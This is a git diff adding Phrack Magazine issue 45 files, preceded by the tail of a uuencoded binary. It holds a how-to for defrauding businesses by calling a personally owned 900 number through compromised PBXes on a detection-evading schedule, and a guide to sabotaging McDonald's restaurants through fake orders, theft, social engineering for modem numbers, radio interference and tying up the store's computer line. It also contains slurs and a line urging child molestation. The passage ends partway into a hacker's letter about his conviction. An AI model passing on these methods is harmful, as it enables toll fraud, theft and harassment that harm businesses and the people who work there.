+MM(3`\>S;Y?JP+J/[6E33L[D7NAET<%BE8/7,-.`?$%FX2AHOB+/Q"^JE0?V/
+M44CHW'_*!(Q#P[P5?+QP]77VF%-';Z0ELDU14QQ@O`7:T.()/L&$Z[++PZ8W
+M-0<6/7%22H&,.T],:N6>6-"*4Z=<9!R&,%%)T/3&C)/'3%F$:Z'&7.5V6,G\
+M?3&#EC00I!14QI`!Q=N@&,N`7W8P6^;/(>.+L:`Q0537$;CYRGCBRC7KBS#D
+M<\*#A7C/B2P!C;;7O;"PK\/(CXS_`))4?1@_XYYH5?$W",EFJ:%D#GNC>]\,
+MCBPN:==KE3Z<('73PQD+M7&MS(:$S(3WX__7XQ+24/TXRB-]F*N4(<834XPB
+M%<8:JD#)<9VIG^+&%R.-"KX^F,D$*NF,`(UWKBI`5<:QN8(Q<-)<@\<"K705
+M=QN$-'0T\M54RG;'%"PN>\^@&.DN079HF_L;B#F''L`(=#:`<SU!F(_Y@'O/
+M3'3-'1106UE-!&RGIH6`,CC`:UC0,D`QS/V@N.N4M9Q346:YV=]SFIGF.>LI
+MP&/C<,B`\$%R?1A!VNS\@*J<3SWF_4K.M.8FE/8Y#@Q=1=FZF#TGOM46`H'/
+M0/\`H;@+>G<@6<)U=5;[;=9*T';%&:LAP)ZE00@]F&@J)(Q-)\+O$3G*&2%<
+MO7QP'<U7*T)XC&7!6KKC&TH`!GUQ@CS:98P6YIZ]<9`1%U\<9V^7QQ5P/TXS
+M&$U"CIC(;F2N-`S7PQ/2Q1?$1]]N$9/GV?:3T7)<")8K:US@'U)1F3MK,W>Q
+M=,1US**2HB;;14.!8-PFV[B_JFWIB!K-24.-[O&0S,'3%FLW(%Q;NLS[-<8V
+M@(NN,]V-0/;Z8J6!2N1.,L8!F,9:T8JY@7%B`<UQI)VIT7&8A^>BR4;AE[\?
+M_]#CAC02`7!H(U/LQNT$(,5>S14QC8",L5+"FN?AC#8T;HF>+=V4\!Z8PZ-"
+MO3&!'H@Q>6)'.:"J?E#KBO=J,5[L^&#NKX<FH>'[=<*M637,K14P'GDC!3>?
+M0G)OCA]^5?95K+I2TU=Q9=#1=XQKW45(P&1BYHY[L@4\`<="<N>6O!_`-*8N
+M'K?'!+L22JD\\\GM><_<$&#FMN"1%C2&L5'N<>F"'F`^[5_!MSI.&)@ROF@<
+MV"8Z-<FH..).*.6W'UNKI#<+-52.>\DRQC>'GJ5"_7A;<K^SQQ!?+;]\<35\
+M'#5",VB<!TS@.NU0&CVE?3"MAY5\B+;+)!<>)JZY3Q,<^3NI&-;EJB-_7AB^
+M9/[HNO\`*W@V"NAH&D@?'2-<YY'4(`@/KA.[%`7%S&05.6*OCS4=<5>PYZCP
+MQ5S"'EI(RQ@M77%MOE]1C+(\E\<9,3E3(>"XD9"0C2-<9$;03N(SQ4!HZ;O;
+MBP?H&A/4XH\%[E.-#"`=I0XUC-H"XRFYR#^6+M8"$U.,AAU&+M;D6IGTQCN_
+M*AUQH9TQEL6>?08T1H0-1C0P;O#%96(5],9:S(?KQC8?#0]<7B82^,`*2X``
+M>W'_T6,FU_R<`ZG^NC^YP67;^M8+G?UKW#`*?^M'WX`RZ#WXPW^M^[&LT/L.
+M*-^T[V8R_0XJ[0>S$U)^7AT^+/\`R8_+G_G$MG_,0QV[;?L2^W`:_P#^!S_W
+M+\)"H_Y#5?L&+TO_`"!/_&F_BQSKQ7_R3N?_`!YWX\!>(_\`H2![3^/#957V
+MY,%%;_7&^T8@G^WC6?8.,.Z?W)Q)1_:/MQ,[5OL.+5&@]F-I?LG`B?1OL&*U
+M']:;[#@#U;BT'VCBSOM8Q/\`:?[\1]?=C`T^G`V'^M,]^)&ZGV8V;^M'VG`'
+MJ?[H8M_?/><9Z^[$[/ZZSV8Q-_7!BU/I)BQZ8I)U]V,0_9=C%-]L^W%:?_#8
+'O^.-_'C_V7C_
+`
+end
diff --git a/phrack45/18.txt b/phrack45/18.txt
new file mode 100644
index 0000000..0150aab
--- /dev/null
+++ b/phrack45/18.txt
@@ -0,0 +1,244 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 18 of 28
+
+****************************************************************************
+
+[** NOTE:  The following file is presented for informational and
+           entertainment purposes only.  Phrack Magazine takes NO
+           responsibility for anyone who attempts the actions
+           described within. **]
+
+****************************************************************************
+
+****************************************************************
+*                                                              *
+*    FRAUDULENT APPLICATION OF '900' SERVICES                  *
+*                                                              *
+*    by CO/der DEC/oder, of Dark Side Research                 *
+*                                                              *
+*    Greetings to Minor Threat, The Conflict and Tristan       *
+*    and dedicated to the English Prankster, Phiber Optik,     *
+*    Louis Cypher and other hackers who have proved an honor   *
+*    to themselves and to our community in not cooperating     *
+*    with "law enforcement."                                   *
+*                                                              *
+****************************************************************
+
+The information presented forthwith is the result of knowledge gained through
+actual first-hand experience.  There is no theoretical aspect to any part of
+this article, except where explicitly noted.  Disclaimer:  this file is for
+outright illegal use.  I sincerely hope publication of this file contributes to
+the delinquency of both minors and adults alike. -- "Codec"
+
+Getting Started
+
+In setting up your own 900 number, you earn a big percentage of the net revenue
+generated by calls made to that number.  You can advertise and promote your
+number in various and sundry ways in an extremely competitive environment,
+or--if you so happen to be a hacker--you can simply dial up some PBXes and call
+the number yourself.  Since you'll be earning several dollars per minute, you
+won't be in any hurry to hang up.  In fact, you may find yourself letting the
+phone stay off the hook while you chat on IRC or read the latest Phrack.
+Though not a scheme to get rich, this can provide a considerable income or
+simply an occasional bonus, depending on your h/p resourcefulness and effort
+exerted.
+
+Before you can start calling your own 900 number and making yourself money, you
+need to buy into the 900 business.  On your next outing for the latest copy of
+Hustler, grab a USA Today.  In the classifieds, (as well as many other business
+classifieds), under the heading "business opportunities," you'll notice any
+number of 900 ads.  You want to find a "service bureau" and not a simple
+"reseller," so shop around and call a number of the companies, asking about
+percentages and whether or not your setup costs (usually ranging from $300 to
+$1500) are comprehensive for the year or whether you'll have to pay a monthly
+fee.  Avoid these pesky monthly maintenance fees.  All sorts of 900 packages
+exist, but you want an automated service--such as a dateline--that is ready to
+all as soon as you've paid.  This means you'll have no equipment to set up, or
+900 trunks terminating at your house, or hookers to hire, etc.  The service
+bureau provides you with the number and the service, so all you have to do is
+market the number (should you be legit).  You can bargain a little on the setup
+fee.  An example of a worthwhile deal would be as follows:  an automated
+dateline number (similar to a voice ail system, only you listen to personal ads
+and have the option of leaving a response) for $750/year, a per minute rate of
+$3.99, and a 75% net return (i.e., you make about $3.00/min).  AT&T and MCI
+provide 900 services to the service bureaus.  AT&T is preferable, as you
+receive payment two months after the end of the calling month, as opposed to
+three months with MCI--so ask about this too.  Your continued efforts will reap
+a monthly check thereafter.
+
+The service bureau actually sends you the check.  You'll want it in a personal
+name to make it easier to cash with your bogus ID.  Some bureaus will "factor"
+your account, meaning that if you've accumulated a lot of credits, they will
+pay you in advance of their getting paid by the carrier--for a percentage fee.
+Don't try to scam them on this; your account is scrutinized closely before a
+premature check is approved.  If everything is done properly, both you and the
+service bureau will be happy.  [That's what's so great about this project:
+everyone wins--you, the service bureau, even AT&T--only the PBX owner loses!]
+
+You will be able to check your credits, or "minutes" as called in the 900
+industry, by calling a special number provided by the service bureau.  After
+entering your account codes, an automated response will give you statistics
+such as daily call reports and total minutes accumulated for the billing month.
+Be sure to find out about the virtual end-of-month date.  The end of each
+billing period is not necessarily the last day of the month.  Accordingly, you
+will need to plan your attacks with this in mind, as we will discuss next.
+
+Getting A Date
+
+Now that you've set up your dateline, you'll be anxious to start earning the
+three bucks a minute.  The dateline makes it kind of fun, since you get to hear
+all kinds of ridiculous messages and the typical horny soliloquy.  Get a
+speakerphone if you lack one now.
+
+You don't necessarily need PBXes--any outdials you find that complete a 900 call
+will suffice.  However, the lines targeted must be those of a business, one
+that is large enough to own a PBX.  Calling on residential lines, cell phones,
+or from small businesses will not work--the owners will get their bill, and
+simply call the phone company and complain that they didn't make the call.
+This will attract undesired attention to your line by the LEC and your
+service bureau, and it will also cost you in that the carrier connect fees,
+about .25 and .30 per minute, will be deducted from your account.  The LD
+carriers get theirs, whether the party pays or not.  This is why the calling
+method encouraged here is the PBX.  If you can manipulate central office
+switches, do so by these same principles.
+
+PBX owners tend to pay their phone bills--including 900 calls that aren't
+outrageous.  They'll assume that one of their own employees made the call, if
+they even notice.  Instead of attempting to exploit a PBX to some astronomical
+degree, you're better off running up a mere fifty to sixty dollar charge.  Do
+this every month as part of a schedule.  Not only may it go unnoticed, but you
+are assured that it will go uncontested even if detected.  Running up an
+excessive number of minutes risks unneeded attention and assures either a total
+"killing" of the PBX, or at minimum, 900 restrictions added by the PBX
+administrator.  Even with a remote admin access, your luck will run out.
+Remember:  YOU WILL ONLY GET PAID IF THE PBX OWNER PAYS THE PHONE BILL!
+
+With this in mind, the most limiting factor is the number of PBXes you can
+accumulate.  The widespread raping of AT&T's System 75/85/Definity in 1992 (as
+a result of discoveries in 1991) made that year extremely ripe for this 900
+scheme.  Many of us managed to accumulate large collections of System 75s,
+including the elusive Super Nigger, who allegedly compiled over 300.  (Where
+the hell were you hiding?)  AT&T security memorandums have since killed
+hundreds of these, but the defaults still work well in some cities.
+Regardless, PBXes abound, and the more you find, the more minutes you can
+generate.
+
+Let's look at a sample attack schedule:
+
+PBX #           M       T       W       Th      F       S       Su
+ 01             15m
+ 02             10m
+ 03              8m
+ 04                             14m
+ 05                             16m
+ 06                             24m
+ 07                             12m
+ 08                             13m
+ 09                                     16m
+ 10                                             2m,10m
+ 11                                             13m
+ 12                                             4m,4m
+
+Twelve PBXes are to be attacked in the sample week, so there are probably fifty
+PBXes totally to be attacked for the month.  Each PBX is to be used only once per
+billing period.  You will  get many months of use out of each PBX with this
+conservative approach, so long as every hacker west of Poland doesn't have
+access as well.  Notice how the number of connection minutes varies, and the
+calling pattern is quite random looking.  The schedule is maintained not only
+to keep track of PBXes in your harem you've fucked for the month, but to assist
+you in generating minutes in a pseudo-random pattern.  It is acceptable to have
+your minutes generated in a pattern, albeit a loose one.  For instance, if all
+minutes are generated only on the weekend, a discerning eye will not attribute
+this to the type of marketing you are using.  The sample schedule is only the
+ideal model.  Having to rigid a pattern, however, such as having an exact
+number of calls each day, is potentially suspicious to your service bureau.
+Simultaneous calls to your 900 number through different outgoing trunks on the
+same PBX is also strongly discouraged.
+
+Listening Software
+
+Calling your 900 dateline number is fun, but when you've got over a hundred
+PBXes to hit each month for an average of fifteen minutes a pop, the novelty
+tends to wear off.  Of course you can have a speakerphone and a time and go
+about other tasks between calls, but why not write a program that will enable
+your modem to do all this for you?  All the program must do is have the modem
+call a PBX from a list, pause, and call your 900 (or another PBX and then your
+900, for LD PBX attacks).  Once connected to your 900, it must stay "listening"
+until a random timer (10-20 minutes) hangs it up.  Depending upon your dateline
+service, the modem may have to emit a DTMF every once in a while to keep the
+service convinced you're still there.  This is a very worthwhile program to
+write--it can drastically reduce your total time spent with this operation,
+leaving you with only the PBX list to maintain (additions and deletions), and
+the spending of your hard-earned cash (the novelty of this WON'T wear off).
+
+Large Charge-Rate Option
+
+A 900 number can be set up to charge as much as $50 per call.  Whether the call
+lasts less then a minute, or for over ten, the cost for the caller is the same
+$50.  In order to set up such an account, you must qualify as an "Information
+Provider," or IP.  Regulations on 900 numbers state that you must be a provider
+of information, not tangible goods.  With a dateline, the information is
+included in your deal with the service bureau, so you are considered an IP.
+The bureau can provide you with your own number that terminates in a voice
+processing or audio-text system, but now you must provide the actual
+information.  Your idea must be approved by the LD carrier, and they tend to
+scrutinize your plans the higher your desired rate.  Your bureau may even
+subject your service to a test to make sure it's not a fake.
+
+One idea is to ask for a $25 per-call rate.  Make like a writer of shareware
+programs, and have your 900's announcement ask the caller to leave name and
+address to be legally registered to use the software, and to receive updated
+versions.  A confirmation notice will be sent to acknowledge the registration.
+Many bureaus will accept this as qualification for IP status, if properly
+presented.  A sample arrangement like this should not cost more than a grand to
+set up.  Stats on minutes are checked just as with the dateline, only you'll
+receive any messages left by callers, and you'll receive any messages left by
+callers, and you'll be able to change the announcements--just like voice mail.
+[IT's always a thrill to call a 900 number and hear yourself thanking the
+caller, heh heh.]  On a $25 line, you should net about $19 per call.
+
+All the same rules apply using this large charge-rate setup.  You can't abuse a
+PBX any more with this option then with a dateline.  It does give you the added
+flexibility for methods used other than PBXes, such as outdials that will only
+connect briefly.  For instance, message notification on voicemail will not
+connect to a number for prolonged durations, but long enough to activate a $25
+charge.  And a typical modem outdial on a mainframe will soon hang up with the
+absence of an answering carrier, but the linger is long enough for a $25 call.
+And with CO switching, the arrangements you make are ideally temporary--turned
+quickly on and off--making a fast $25 hit optimal.  Lastly, if you are skilled
+in accessing corporate phone closets (see "Physical Access and Theft," Phrack
+43) or the corresponding outside plant, you can use your test set to call your
+900.  Obviously a large charge-rate would be better here too, rather than
+standing for endless periods of time in compromising positions connected to a
+squawking dateline.
+
+No matter how you access business lines, be sure they belong to a large
+company.  Definitely experiment, but do so in moderation--make any necessary
+notes (like time and date of call) and wait for your 900 billing statement to
+see if the call was paid for.  [Your billing statement, essentially a call
+accounting summary, is created for each billing month by the LD carrier and
+sent to you via the service bureau with your check.  It includes the calling
+phone numbers, time, date, duration, etc. of all calls made to your number.]
+
+A Final Word
+
+It would be hard to get "busted" doing anything mentioned in this article.
+Even if you're nabbed for misdemeanor PBX abuse, no one will ever imagine--let
+alone try to prove--that the 900 number you were calling is your own.  [Hey,
+you're just a desperately lonely guy!]  However, be wary of pen registers
+(DNRs) if you've been up to other dark deeds, and set up your calling
+operations at a safer place.  Don't check your minutes using any of the same
+means that you use to generate them (a record of your calling into your 900
+backdoor is probably the most incriminating track you can make).  Keep your 900
+account anonymous, as with your address, voice mail, and ID/SSN.
+
+Welcome to the dark side--and best of luck.
+
+                        Sincerely,
+
+                        CO/der DEC/oder
+                        DSR
+
+[ The Author can be reached, when the system is up, at:
+  codec@crimelab.com ]
diff --git a/phrack45/19.txt b/phrack45/19.txt
new file mode 100644
index 0000000..a736006
--- /dev/null
+++ b/phrack45/19.txt
@@ -0,0 +1,366 @@
+ 
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 19 of 28
+
+****************************************************************************
+
+
+[** NOTE:  The following file is presented for informational and
+           entertainment purposes only.  Phrack Magazine takes NO
+           responsibility for anyone who attempts the actions
+           described within. **]
+
+****************************************************************************
+
+                     Screwing over your local McDonald's
+                                - Charlie X -
+
+INTRODUCTION
+
+     Ok... everyone is familiar with the world's largest and fastest
+growing fast food chain, McDonald's. The founder, Ray "Crock", wanted an
+environment where families and friends could get food with friendly
+service at any time of the day... Boy, what a crock, at least now.
+
+    To top everything off, McDonald's attacks decent food establishments
+by criticizing the food content... not like you'll find anything not
+genetically engineered in McDonald's food... Everyone must realize that
+McDonald's sucks, and you must do your part to put the fucking place out
+of commission...
+
+     As far as I can tell, everyone in McDonald's is rude and has an
+attitude, from the management to the customer. They, as most
+restaurants do, firmly believe THE CUSTOMER IS ALWAYS RIGHT. This is
+true even when the customer is an asshole with blind disregard for
+everyone and everything. This is where you come in... Here are a few
+things that you can do to put your local McDonald's in it's place...
+
+     Recently in the news, a major group sited McDonald's as the most
+environmentally responsible establishment on the planet (note: this is
+even over green peace and Sally Struthers)... how the hell is this
+possible?
+
+SENIOR CITIZENS BENEFIT DAY/WEEK
+
+     McDonald's is nice to senior citizens. Every McDonald's offers
+free or reduced price meals or drinks to Senior citizens... Now, all
+you have to do is attract them. For a minimal price, you can publish
+an ad in the local newspaper, or publish your own flier (can be
+cheaply made) which explains that a certain day/week, your local
+McDonald's will recognize senior citizens with free food, coffee,
+senior activities, you know... a big senior social. You may want to
+mention that other organizations will be there to speak and make the
+whole "event" decent... Now, if your McDonald's already offers
+free/reduced coffee, food, or sodas, this will definitely break them,
+and cause them to order much more supply, and could even cause them
+to run out of coffee or soda for the rest of the day... on the other
+hand, if they don't offer this, the mass crowd of old people asking
+for shit will certainly piss someone off... This has been tested, and
+as a result, a McDonald's had to close for a day to reorganize and
+reorder supplies, as well as "launch an investigation" about this
+Day, but they never turned up anything.
+
+GARBAGE CAN TRICKS
+
+     Since McDonald's is usually a busy restaurant, the trash bags
+fill up quickly and must be changed frequently (but never are.) There
+are several things you can do to the trash cans. For starters, ask
+for hot or boiling water. If you don't want to attract attention by
+doing this, bring in your own really hot water... boil it, put it in
+a Styrofoam cup or a thermos... once in McDonald's, locate the filled
+trash can (should not be hard to find) and dump the hot water down
+the side. Not only will this melt the side of the bag, causing the
+trash to go everywhere, the person who takes out the garbage must
+pick up all the trash by hand and dump out the trash can with water
+in the bottom. This also soaks the trash, breaks up paper, and makes
+the whole experience quite unpleasant, but hilarious to watch.
+
+     Another easy trick is to walk up to the trash can areas, take
+the trays sitting above the trash cans, and simply throw them in all
+the cans. This will either make the employee fish them out by hand,
+or will cause the restaurant to be short of several trays, which
+becomes quite annoying.
+
+FOOD TRICKS
+
+     There are several things to do with the food. Since there is
+probably something wrong with it in the first place, you might want
+to simply make the problem bigger... Before you enter the restaurant,
+cut some of your hair, or hair off of a pet. When at your table,
+place the hair all over the inside of the burger. When the line at
+the counter is long, and everyone is busy, cut up to the front of the
+counter, and start complaining about your burger. Show EVERYONE the
+hair inside the burger. You will get another burger, and most likely,
+a lot of free shit so you will come back. You will also cause most
+everyone to leave, and people in the kitchen to get shit on by the
+manager.
+
+ON A BUSY DAY...
+
+     Busy days are the best. Customers are in a hurry, so are the
+employees... everyone has a short fuse and usually do not pay
+attention to what you say, or get very pissed. Ask for real dumb
+shit... For example, "I'd like a 69 piece Chicken McNugget." The best
+thing to do is to order a simple cheeseburger, and screw it all up
+with special orders... For example, "I'd like a cheeseburger, with
+extra cheese, no mustard, extra catsup, extra onions, lettuce,
+tomato, a real little dab of mayo, and make it well done... oh wait,
+I don't want cheese anymore. Just put extra lettuce on it... [wait
+for them to send the order back to the kitchen]... then Oh, wait,
+sorry... I just want a BigMac." You can also say, "I'd like a medium
+Coke with just 4 pieces of ice in it." They will always do what you
+say... Keep in mind that special orders do not cost extra, so you can
+order a hamburger, ask for extra mustard, catsup, and somewhere in
+there, casually mention extra cheese... 9 times out of 10 this
+works... and you don't get charged. NOTE: if you hear a printer
+printing followed by 3 beeps somewhere in the kitchen, your grill
+order was printed, and will be made... so change it after you hear
+that.
+
+     In some McDonald's, you will find the "Need A Penny - Take a
+Penny," Where people put in their loose change in case someone else
+is short some money... steal ALL the money in this. In one month, I
+made $42.71 from stealing the money from all the Need A Penny cups in
+my area... This is a good secondary income for lazy people.
+
+     If you plan on a big order, start off by telling the person you
+just want a soda. After they give a total and get ready to take your
+money, add an item. Keep saying "That's it" and repeat this process
+until you have what you wanted, and have wasted several minutes. You
+can also have the cashier repeat your order as many times as you
+wish, also wasting time.
+
+
+THE INQUIRING CUSTOMER
+
+     McDonald's managers pride themselves in knowing the answers,
+and employees like to pretend that they do. So, on a busy day, keep
+asking dumb questions... Here are a few to ask... Oh, never actually
+order anything... just hold up the line with your questions. Here are
+a few questions to ask:
+
+     - "How is your meat prepared at the factory?"
+     - "What part of the chicken does the McNugget come from?"
+     - "Who was the BigMac named after?"
+     - "What is the post-cooked weight of your quarter pounder?"
+     - "Where does your <pick a vegetable> come from?"
+     - "How fresh is your <McD product>?"
+     - "What is the square root of 69.666?"
+     - "What is the nutritional value of a 9 piece McNugget box?"
+
+DRIVE-THRU FUN
+
+     McDonald's videos tell the employees that the Drive Thru makes
+up for more than 40% of the average McDonald's business. Simply put,
+this system needs a lot of work. The speakers rarely work, and you
+usually get your order screwed up. The first thing to do is to take
+your car and back over the cut square in the pavement right beside
+the order sign several times. This causes a loud annoying "bong" to
+be heard by everyone with a headset... eventually the manager will
+come out with a weapon, and this is where you leave.
+
+     Another thing to do is to drive up, and say, "I just want a lot
+of butter..." or "I'd like a large penis to go please." Usually,
+people in the drive thru service will laugh or screw something up,
+and you will get yelled at by the manager... waaah.
+
+     If you want free food, order something in the drive thru. Keep
+your window down to listen to other orders. After you receive your
+food, park and enter the restaurant. Go to the front of the line and
+tell the person on duty that your order was screwed up... it helps to
+remember what someone else's order was, and then you just ask for
+that... you will get it. Sometimes, you even get free food for having
+a screwed up order.
+
+     This prank requires guts, but can be somewhat amusing. Simply drive
+up in front of the sign, turn your engine off, and go inside the restaurant
+and eat. There's always room to park in the drive-thru lane... You could also
+tell the drive-thru person that your car stalled, and you will have to call
+the motor club. This can put a drive-thru out of commission until you decide
+to move your car.
+
+     If you happen across a McDonald's that is expecting deliveries, or has
+cleaned the parking lot, you will notice traffic cones. You can move these
+cones around the drive-thru sign. Some people are stupid and will drive thru
+them anyway, so you may want to place a sign saying "DRIVE THRU CLOSED -
+- SORRY - MANAGEMENT." You can also place a legitimate order at the drive thru
+and right after your order, you can put a sign on the drive-thru sign saying
+the same "closed" message. The drive thru sensor does not sense foot traffic,
+so you can walk up to the sign and put one there...
+
+     The drive thru headsets can be a good source of amusement. When
+ordering, mumble your order, scream it real loud, or say it like the
+microphone is cutting out, for example, "I'd like to order a LARGE
+ibbit-obbt-ibbit-urger with no Sa... and extra <crackle> and I'd also
+like a Med<cut> Oke." When they ask you to repeat, do the exact same
+thing. Remember, that as soon as you drive up to the sign, they can
+hear everything in your car... even if they are not talking. As soon
+as they ask for your order, turn your stereo up real loud, and begin
+to say your order... this screws everything up... Also, ask for a
+hotdog, or an item that you know they don't have. If you have the
+guts, are really bored, and are not driving YOUR car, take them
+seriously when they say "please drive through." This would be the
+ultimate action, putting your local McDonald's out of business.
+
+    If you have a simple shortwave transceiver, Ham Radio, or powerful
+handheld transceiver, you can talk to the entire drive-thru crew.
+The antenna is located above the cashier in the drive-thru box and has
+a receiving radius of the entire store and about half of the parking lot.
+You can add stuff to peoples orders, or just screw around. Drive thru
+people have noticed that illegally powerful CB radios, side band radios
+and even some car phones can be picked up with the headsets. Be innovative
+and use these to piss the employees off. If you do not have access to one,
+simply hide behind the sign, and shout extra food or obscenities at
+the sign...
+
+GREASE DISPOSAL FUN
+
+     This next trick involves little or no intelligence, or imagination,
+but seems to get people every time. Behind McDonald's, usually found next
+to trash cans or the empty soda-syrup containers, you will find a large
+drum marked "not-fit for human consumption" or "inedible contents."
+Although these warnings belong in the food, they mark the grease vat. This
+is tightly sealed for a reason... it smells like dead human. They are also
+easy to open. Usually, you can loosen the ring around the top and open
+the lid. Be sure to cover your face when you do this... it does smell like
+shit... The nice thing about this is that the smell will cover the entire
+parking-lot area in roughly 10 minutes. Chemically, the smell will cause
+nausea, and definitely a loss in appetite. People will get sick everywhere,
+and definitely cause a loss of customers at McDonald's...
+
+     A simple addition to the previous trick would be to tip the can. The
+grease will probably have hardened, but on a warm day or if the black
+can is left in the sun, it will leave a sticky, raunchy mess in the
+parking lot that will be impossible to clean up, and will stink infinitely.
+This is a way to make the trick more damaging and longer lasting.
+
+DUMPSTER FUN
+
+     McDonald's, or any fast food restaurant usually has a high volume of
+garbage output (not including the food). If you can travel around and
+find large objects, you can dispose of them in the trash containers. If
+you clog them up, not only will the store have to pay for an extra
+collection of trash (to remove what you put in there), They'll have to pay
+extra for later (or earlier) you do it, as well as what kind of objects
+you put in there. You can also put the empty silver soda containers, bread
+racks, or even signs and loose McDonald's shit in the trash. They won't
+appreciate the loss, and it's gonna cost them money at both ends. Lame
+but definitely effective.
+
+PHONE ORDER PHUN
+
+     One thing that is not very well known is that McDonald's accepts phone
+orders. This is a simple process. A serious, adult sounding voice can call
+a local McDonald's and claim that they have a large order that they would like
+ready for pickup. You supply a BS phone number, a BS name, and a BS order. The
+larger it is the better. Usually give about a half an hour to an hour notice
+to have the order ready. Good reasons for the orders are usually family get-
+togethers, meetings at local universities, etc. The university excuses are much
+better, because you can supply a college phone number (found in the phone book)
+and if they call (the usually don't) to verify the order, they will get the
+office, and will think it's legitimate. This prank is a beauty because after
+the manager takes the order, it is given directly to the kitchen, who begins the
+order. Again, they very rarely verify the orders, so it is easy to pull these
+off. To make this prank better, you should throw in mass quantities of food
+items that people NEVER eat -- Filet O' "Fish", Fajitas, etc... You can also
+call them back at the time of pickup, and say "sorry, we decided to eat at
+burger king..." DO NOT enter the restaurant and ask to buy the items at a
+cheaper price, like the old pizza man trick... that's just lame.
+
+COMPUTER PHUN
+
+     A nice thing about McDonald's is that it is linked via computer (and modem)
+to OakBrook, Illinois. Check your local phone book for a McDonald's with 2 lines.
+The second line is usually the computer line. You may also try Information.
+If you aren't able to get the number, read these next 3 parts...
+
+     - McDonald's are listed by Restaurant number in the phonebook. You can
+       retrieve the number, then call the restaurant, asking for the manager.
+       When the manager identifies himself, with his name, you write the
+       name down, and tell him to get bent or something.  With that information,
+       you can call McDonald's 800 number, or any McDonald's Corporation HQ number
+       in OakBrook, Illinois (they will relay your call). You say you haven't
+       been receiving updates or any purchase orders, you identify yourself,
+       and your store number, and location (city, state...). They will check
+       the listings, and read off the phone number of the computer. If they
+       won't give it to you, they will allow you to change the computer number,
+       where you give them your enemies phone number or something, and they
+       will get called by modem repeatedly...
+     - Call your local McDonald's, identify yourself as Bill Haggan of Computer
+       Services, McDonald's, Oakbrook... etc. Say you are updating your records,
+       and need the computer telephone number. Get the number, then give them
+       a bullshit verification number.
+     - This is not very imaginative, but it works... it's also risky... wooooo.
+       Find the phone box, open the user service box, connect any phone with an
+       RJ-11 adaptor to the box and type your local ANI number (211, 811-9967)
+       etc... do that for each line that enters the restaurant. Then reconnect
+       it... you have the numbers.
+
+     Now that you have the numbers, there is a lot you can do. It is not wise to
+enter the computer. Although goodies are buried there, any changes you make are
+corrected that night with a verification call. It is also verified voice.
+However, everything in the restaurant is connected to the computer. Once you
+call the number, and connect to the computer, just sit there. The computer
+freezes all time clocks, order programs, etc. Every display will be marked
+"BUSY." This prevents anyone from punching in or out, the manager from checking
+labor, printing schedules, do inquiries about anything... basically interrupt
+most managerial and owner duties. If you find a constant busy signal, this
+is very easy to correct. Simply ask for an operator interrupt. If the operator
+breaks in, the beep will hang up the modem, allowing you to call right in.
+This prank does have profound effects on the McDonald's. It is highly
+recommended.
+
+FREE SHIT AT McDonald's
+
+     Yes, I do mean shit... If you are involved in that fucking money crunch
+like everyone else, and you feel that your money should be spent on better
+things, rather than shitty food, here are a few pointers for free food.
+These have all been tested. If you are caught in the act of getting free
+food, nothing will happen, and it will be a big source of amusement...
+
+Cheeseburger -  On a busy drive-thru day, you can ask for a special order.
+  Ask for a hamburger with an extra item, like mustard or
+                something, and casually sneak in "extra cheese." If the
+  employees are stupid enough (a given), and the grill doesn't
+  question it, you will find yourself with a nice fresh
+  cheeseburger for the price of a hamburger... whoopee...
+Any Item -      The BEST thing to do is order something in the drivethru,
+  and then come in the restaurant with the bag from drive
+                thru and say "You forgot ..." If you ask the employees at
+  the counter, 9 times out of 10, you will get it... To be
+  on the safe side, you may want to go home, call the
+                McDonald's, say you went through the drive thru and you
+  didn't get your food item. You can give a bullshit name
+   or whatever, usually they don't even take the name, and
+  the next time you go in, you say you called, and you will
+  get gift certificates or free food... works every time.
+
+BASTARDIZING FOOD ITEMS
+
+     If you want to attract a certain degree of attention to yourself, and
+make employees and customers laugh, when you order food, fuck up the names
+to say something cool... You'll still get the food you don't want, and this
+too is a source of amusement. Spur-of-the-moment name bastardizations are
+by far the funniest, but here are a few suggestions...
+
+SHMEGMA MAC, SHMEGMA SACK - instead of Mega Mac (shmegma is Dick Cheese)
+CHICKEN McFUCKUPS - Chicken McNuggets (be sure to ask for the 69 piece)
+McDICKEN - McChicken (ask for extra Mayo and smile...)
+CHOKE - Coke (I'd like a small choke with no ice)
+McRIBBED FOR HER PLEASURE - McRib... Do they still make this?
+FAGINA - Fajita (I'd like a FAGINA with extra cheese...)
+
+IMPORTANT
+
+     Remember that McDonald's slogan is Food, Folks, and Fun...
+Just take the "fun" part to the limit... You sort of have to compensate
+for the asshole "folks" and the shit "food."
+
+     If you get bored, start molesting kids on the
+playland or just break shit... throwing salt shakers (plastic or
+glass) at the outside wall of the McDonald's is fun too... take
+advantage of whatever there is in McDonald's... there are infinite
+possibilities to create your local McDonald's an utter McHell. Don't
+consider it illegal (most of it isn't...) consider it more of a
+public service. Yeah... That's it.
diff --git a/phrack45/2.txt b/phrack45/2.txt
new file mode 100644
index 0000000..3f33fb3
--- /dev/null
+++ b/phrack45/2.txt
@@ -0,0 +1,765 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 2 of 28
+
+****************************************************************************
+
+                            Phrack Loopback Part I
+
+Letter from Louis Cypher  (Byron York)
+
+As many people know, I was convicted over the summer for a number of
+Federal crimes including counterfeiting, burglary of a post office,
+theft of US mail, and possession of stolen property. For a little
+background, I was arrested for these crimes in September of 1992.
+I stayed out on 50,000 dollar bond until the trial which started the
+day after Summercon 93'. The trial lasted for about a week and a half,
+and the jury found me guilty on 4 charges and acquitted me on 2.
+
+My sentencing was not until the 8th of November, and the results
+were not as I had hoped for being a first time offender and all.
+I received a 21 month sentence that will be carried out if I do
+not complete 6 months in a Federal boot camp in Pennsylvania.
+If I do complete the program at the boot camp I will then spend
+6 months in a Federal halfway house in Houston. This will be
+followed by several months of home confinement, then 3 years
+parole. I am to attend college while on parole, but if I do not
+do well, then I have to do 300 hours of community service.
+
+I will start serving my sentence as early as December, or as late
+January. Won't know until I receive the letter in the mail from
+the Bureau of Prisons. I am still out on bond and am on voluntary
+surrender so I just deliver myself to wherever they send me. A lot
+better than rotting in county jail until they transfer me.
+
+I will hopefully be out still for HoHocon, and will be able to
+say good-bye to most people in person. But in case I am not, then
+I would like to use this forum to tell everyone good-bye. I know
+that I am not going away forever, but I don't know when I am
+going to be able to access a modem again and get back in touch
+with everybody.
+
+I have been running a public access Internet site in Houston
+for the past year or so, and luckily, thanks to Drunkfux,
+Absalom, and Lord Macduff, the system will most probably
+stay up in my absence. People will be able to mail me there,
